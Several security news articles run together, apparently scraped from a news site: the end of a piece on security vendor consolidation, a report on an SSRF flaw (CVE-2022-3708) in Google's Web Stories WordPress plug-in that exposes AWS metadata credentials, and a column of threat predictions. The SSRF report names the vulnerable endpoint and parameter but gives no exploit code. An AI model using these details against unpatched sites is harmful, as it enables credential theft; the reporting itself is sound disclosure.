"Managing multiple vendors can be burdensome for IT, while valuable security insights sit siloed in separate dashboards," Vasu Jakkal, corporate vice president for security, compliance, identity, and management at Microsoft, stated in a blog post. "And siloed solutions can result in fragmented visibility and can be exploited."

As part of the strategy, many vendors are buying up smaller firms and rivals — a mixed blessing for companies given that they may have fewer choices in the future. Companies may get more capabilities for less, but they may also find themselves paying for unwanted features, says Forrester's Maxim.

"Whether companies are planning to consolidate or not, I think a lot of consolidation is going to happen on its own, either through strategic M&A or fire-sale M&A, because of where we at in this economy," he says. "Private equity still has a huge amount of capital, and the operations benefits from reducing the number of vendors is significant."

Finally, organizations will find that there are some costly security and risk areas that they simply cannot jettison, such as compliance and governance costs, Critical Insight's Hamilton says. Publicly traded companies, in particular, have little leeway in cutting the costs associated with some regulations.

"You cannot neglect things like governance," he tells Dark Reading, "and you have to make sure your compliance is being met every year."

Security on a Shoestring? Cloud, Consolidation Best Bets for Businesses

A successful attacker could use the SSRF vulnerability to collect metadata from WordPress sites hosted on an AWS server, and potentially log in to a cloud instance to run commands.

A vulnerability in the Google Web Stories plug-in for WordPress could be exploited via a server-side request forgery (SSRF) vulnerability to steal Amazon Web Services (AWS) metadata from sites hosted on the AWS server. That metadata can include sensitive information such as the AccessKeyId, SecretAccessKey, and Token.

An SSRF vulnerability gives attackers a way to elevate privileges on a compromised system using a modified URL, thereby gaining access to internal resources.

The Web Stories plug-in is an open visual storytelling format for the Web, consisting of animations and other interactive graphics, which can be shared and embedded across sites and apps. There are more than 100,000 active installations of the plug-in.

A Wordfence research team discovered the plug-in was vulnerable to the SSRF bug (CVE-2022-3708) in versions through 1.24.0, due to insufficient validation of URLs supplied via the "url" parameter found via the /v1/hotlink/proxy REST API Endpoint.

"Exploiting this vulnerability, an authenticated user could make web requests to arbitrary locations originating from the web application," Wordfence Threat Intelligence team member Topher Tebow wrote in a Dec. 21 blog post.

He added that, in testing, the team was able to uncover specific metadata used to enable features like EC2 Instance Connect; stolen metadata could then be used to log in to the virtual server and run commands through the terminal.

The researcher noted that this is the tip of the iceberg: "There are many metadata categories provided by AWS that each have specific uses and varying degrees of severity if misused."

The team found the flaw in October, and by the end of November, two blocks of code were updated to fully patch the vulnerability in the plug-in.

"With the patch applied within version 1.25.0 and newer, attempts to obtain AWS metadata will fail," Tebow explained.

He added that the attack can succeed for users logged in with an account that has minimal permissions, such as a subscriber, so the issue particularly threatens sites with open registration.

"The authenticated user does not need high level privileges to exploit this vulnerability," Tebow continued.

**Using Zero Trust to Limit SSRF Vulnerabilities**

"Understanding the impact of vulnerabilities such as SSRF vulnerabilities is critical for developers," Tebow wrote. "Keeping code secure can be difficult to ensure during the development phase, which is why the code must be tested for vulnerabilities during and after it has been written."

Developers were advised to pay close to attention to their coding practices as they relate to the vulnerabilities inherent in each programming language, ensure any inputs are validated, and to adopt a posture of zero trust authentication.

"SSRF vulnerabilities are possible because the internal and external resources may be configured to assume that requests sent from an internal location are inherently trustworthy," Tebow noted. "By requiring validation and authorization for every action, this default trust is removed, and requests must be validated properly before being considered trusted."

Constant code reviews and updates of WordPress plug-ins and themes are among the other steps that developers can take to limit exploits of WordPress-built websites.

**WordPress Sites Face a Raft of Security Issues**

Malicious actors have been targeting WordPress sites at a rapid clip — mainly through vulnerable plug-ins — since the beginning of the year: In February, a report found tens of thousands of websites powered by WordPress were vulnerable to attack via a remote code execution (RCE) bug in a widely used plug-in called Essential Addons for Elementor.

In May, there was a widespread attack launched to exploit known RCE flaw in the Tatsu Builder WordPress plug-in, and two months later, researchers discovered a phishing kit that injects malware into legitimate WordPress sites and uses a fake PayPal-branded social engineering scam.

More recently, a threat group called SolarMarker exploited a vulnerable WordPress-run website to encourage victims to download fake Chrome browser updates, while another group of attackers were actively exploiting a critical vulnerability in BackupBuddy, a WordPress plug-in that an estimated 140,000 websites are using to back up their installations.

Google WordPress Plug-in Bug Allows AWS Metadata Theft

Our growing interconnectedness poses almost as many challenges as it does benefits.

The number of cyberattacks around the world jumped 28% in the third quarter of 2022. Such a figure is not surprising because recent years have brought more and bigger attacks on almost every sector. The coming year will no doubt also be filled with attacks and risks, despite companies spending even more on solutions and both governments and the private sector taking further steps to prioritize security.

While many of the current trends will continue, there also will be significant changes and developments in the year ahead. The increasingly efficient and business-minded manner of both cybercriminals and state-backed attackers will drive many of these growing trends and new challenges.

**Expect More Disruptive Attacks**

Business disruption due to cyberattacks is on track to become a bigger problem. During the past 12 months, 93% of organizations have suffered a data-related business disruption, and 43% reported permanent data loss, according to a recent survey. This comes as attackers move away from ransomware attacks, which hold data hostage for money and have fallen by 8% in recent months, and carry out attacks simply to disrupt services and activities, sometimes by erasing data, rather than to raise money. 

Political motivations are often behind such purely disruptive attacks, including Russia-linked or Russia-backed hackers who have targeted businesses in Ukraine, or those that support Ukraine. The public nature of these disruptive attacks, including denial-of-service (DoS) attacks, is also an effective way for hacking groups to build up their brands. This public relations effort is important as more groups, including the infamous Conti group that shut down several government websites and services for months in Costa Rica, seek affiliates to work with on attacks.

**Signs Are Pointing to a Catastrophic Attack**

We will not likely get through the coming year without some sort of catastrophic attack on a very strategic and important network or service provider like Gmail, WhatsApp, or Microsoft. We have long known — and it became even more clear from Twitter whistleblower and former head of security Peiter Zatko, who exposed lax data security practices at the social media giant — that the biggest tech companies, with the biggest security budgets, still have severe challenges. 

If a global software provider or communication platform is attacked it could lead to significant disruption of business and communication, and put the personal data of billions at risk. It would be a worldwide event with lasting economic, social, and political consequences.

**Supply Chain Attacks Will Persist — and Grow**

Supply chain attacks, in which bad actors gain access to organizations through third parties, enabling one attack to include hundreds of victims, will continue to increase as hacking groups become more business-oriented and concerned with efficiency. These types of attacks have already increased by nearly eightfold over the past three years. Many of the largest and most threatening groups are no longer operating alone. In addition to working with affiliates, they are working with states. States are hiring them, funding them, or simply providing them a safe harbor from which to operate. With more at stake, including funding from government or affiliates, these groups are under pressure to accomplish more damage in shorter amounts of time, in the most efficient way possible.

These bad actors are evolving into a modern form of organized crime, and as long as efficiency and results remain important to them, they will pursue supply chain attacks. Such attacks put every sort of organization that uses any type of cloud software at risk, meaning every company must embrace intelligence and be prepared for attacks from sophisticated criminal gangs or state-backed attackers.

**Personalized Attacks Will Target Executives and Their Friends and Family**

We will see more personalization of attacks, including bad actors using tactics like demanding money or network access credentials in return for not releasing valuable or sensitive data they already have. A growing related tactic is "sextortion," or threatening to release embarrassing information, photos, or videos unless the victim gives over money, information, or network credentials. In other cases, attackers offer to pay money in return for passwords or other information that can help them carry out a future cyberattack. 

What all of these attacks have in common is that they are very personal in nature, especially those that rely on sextortion. They can affect business executives, public figures, and anyone else who has a public profile or access to confidential or valuable data and information. But in addition, these types of attacks also often involve friends or family members of their ultimate victims. For example, in one case my company dealt with, a teenager received emails threatening to reveal that he was gay — something his family did not know — unless he installed some files on his home network. Acting out of fear, he installed the files, and this eventually gave a cyberattacker potential access to his mother, an executive at a large company.

With attackers growing more sophisticated and more focused on efficiency, it is more important than ever for businesses to understand and improve their security posture. In the constantly evolving threatscape, no organization can consider itself immune to attacks by the biggest hacking groups, including those backed or sheltered by governments. We are entering a new era in which interconnectedness poses almost as many challenges as it does benefits.

Tag

#intel